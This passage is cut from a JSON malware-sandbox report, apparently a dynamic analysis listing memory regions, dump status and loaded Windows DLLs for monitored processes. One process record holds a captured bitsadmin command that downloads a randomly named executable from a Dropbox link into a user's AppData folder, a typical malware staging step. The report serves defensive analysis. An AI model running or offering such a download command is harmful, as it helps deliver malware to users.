"region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:17.704", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000571-addr_0x0000000000180000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_167", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_571", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:17.704", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000572-addr_0x00000000001a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_168", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_572", "name": "private_0x00000000001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1703936, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000573-addr_0x00000000003a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_169", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_573", "name": "private_0x00000000003a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3801088, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 6455295, "entry_point": 0, "filename": null, "id": "region_574", "name": "pagefile_0x00000000004a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4849664, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 8065023, "entry_point": 0, "filename": null, "id": "region_575", "name": "pagefile_0x0000000000630000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6488064, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_576", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994850304, "filename": "\\Windows\\System32\\user32.dll", "id": "region_577", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_578", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:17.705", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_579", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:17.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791675437056, "type": "region", "version": 1 }, "end_va": 8791675535359, "entry_point": 8791675437056, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_580", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791675437056, "timestamp": "00:00:17.706", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791716265984, "type": "region", "version": 1 }, "end_va": 8791716351999, "entry_point": 8791716265984, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_581", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 8791716265984, "timestamp": "00:00:17.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791716397056, "type": "region", "version": 1 }, "end_va": 8791716446207, "entry_point": 8791716397056, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_582", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 8791716397056, "timestamp": "00:00:17.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 8791716462592, "type": "region", "version": 1 }, "end_va": 8791716552703, "entry_point": 8791716462592, "filename": "\\Windows\\System32\\netapi32.dll", "id": "region_583", "name": "netapi32.dll", "norm_filename": "c:\\windows\\system32\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791716462592, "timestamp": "00:00:17.709", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791732649984, "type": "region", "version": 1 }, "end_va": 8791732699135, "entry_point": 8791732649984, "filename": "\\Windows\\System32\\version.dll", "id": "region_584", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791732649984, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791745429504, "type": "region", "version": 1 }, "end_va": 8791745572863, "entry_point": 8791745429504, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_585", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791745429504, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791746084864, "type": "region", "version": 1 }, "end_va": 8791746129919, "entry_point": 8791746084864, "filename": "\\Windows\\System32\\secur32.dll", "id": "region_586", "name": "secur32.dll", "norm_filename": "c:\\windows\\system32\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 8791746084864, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791746281472, "type": "region", "version": 1 }, "end_va": 8791746433023, "entry_point": 8791746281472, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_587", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791746281472, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752564735, "entry_point": 8791752507392, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_588", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791752572928, "type": "region", "version": 1 }, "end_va": 8791753396223, "entry_point": 8791752572928, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_589", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791752572928, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791767646208, "type": "region", "version": 1 }, "end_va": 8791767834623, "entry_point": 8791767646208, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_590", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791767646208, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791767842816, "type": "region", "version": 1 }, "end_va": 8791768264703, "entry_point": 8791767842816, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_591", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791767842816, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791768301568, "type": "region", "version": 1 }, "end_va": 8791768334335, "entry_point": 8791768301568, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_592", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791768301568, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791777017856, "type": "region", "version": 1 }, "end_va": 8791778103295, "entry_point": 8791777017856, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_593", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791777017856, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791778656256, "type": "region", "version": 1 }, "end_va": 8791779119103, "entry_point": 8791778656256, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_594", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791778656256, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791780753408, "type": "region", "version": 1 }, "end_va": 8791781404671, "entry_point": 8791780753408, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_595", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791780753408, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791781539840, "type": "region", "version": 1 }, "end_va": 8791781855231, "entry_point": 8791781539840, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_596", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791781539840, "timestamp": "00:00:17.713", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791781867520, "type": "region", "version": 1 }, "end_va": 8791783100415, "entry_point": 8791781867520, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_597", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791781867520, "timestamp": "00:00:17.713", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", "filename": "c:\\windows\\system32\\bitsadmin.exe", "id": "proc_4", "image_name": "bitsadmin.exe", "monitor_reason": "child_process", "monitored_id": 4, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000004-region_00000620-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_179", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_620", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:22.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_621", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:22.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_622", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:22.739", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000623-addr_0x0000000000170000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_180", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_623", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:22.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_624", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:22.739", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_625", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:22.740", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000626-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_181", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_626", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:22.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 331776, "start_va": 4280942592, "type": "region", "version": 1 }, "end_va": 4281274367, "entry_point": 4280942592, "filename": "\\Windows\\System32\\bitsadmin.exe", "id": "region_627", "name": "bitsadmin.exe", "norm_filename": "c:\\windows\\system32\\bitsadmin.exe", "region_type": "memory_mapped_file", "start_va": 4280942592, "timestamp": "00:00:22.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791785144320, "type": "region", "version": 1 }, "end_va": 8791785148415, "entry_point": 8791785144320, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_628", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791785144320, "timestamp": "00:00:22.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_629", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:22.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000630-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_630", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:00:22.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000631-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_631", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:00:22.816", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000632-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_632", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995898880, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_633", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791751000064, "type": "region", "version": 1 }, "end_va": 8791751438335, "entry_point": 8791751000064, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_634", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751000064, "timestamp": "00:00:22.819", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_635", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_636", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_637", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000638-addr_0x0000000000320000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_638", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000639-addr_0x00000000004a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4915199, "entry_point": 0, "filename": null, "id": "region_639", "name": "private_0x00000000004a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4849664, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994850304, "filename": "\\Windows\\System32\\user32.dll", "id": "region_640", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_641", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:22.831", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_642", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791732649984, "type": "region", "version": 1 }, "end_va": 8791732699135, "entry_point": 8791732649984, "filename": "\\Windows\\System32\\version.dll", "id": "region_643", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791732649984, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791751589888, "type": "region", "version": 1 }, "end_va": 8791752486911, "entry_point": 8791751589888, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_644", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791751589888, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752564735, "entry_point": 8791752507392, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_645", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791752572928, "type": "region", "version": 1 }, "end_va": 8791753396223, "entry_point": 8791752572928, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_646", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791752572928, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791753424896, "type": "region", "version": 1 }, "end_va": 8791767613439, "entry_point": 8791753424896, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_647", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791753424896, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791767842816, "type": "region", "version": 1 }, "end_va": 8791768264703, "entry_point": 8791767842816, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_648", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791767842816, "timestamp": "00:00:22.832", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": 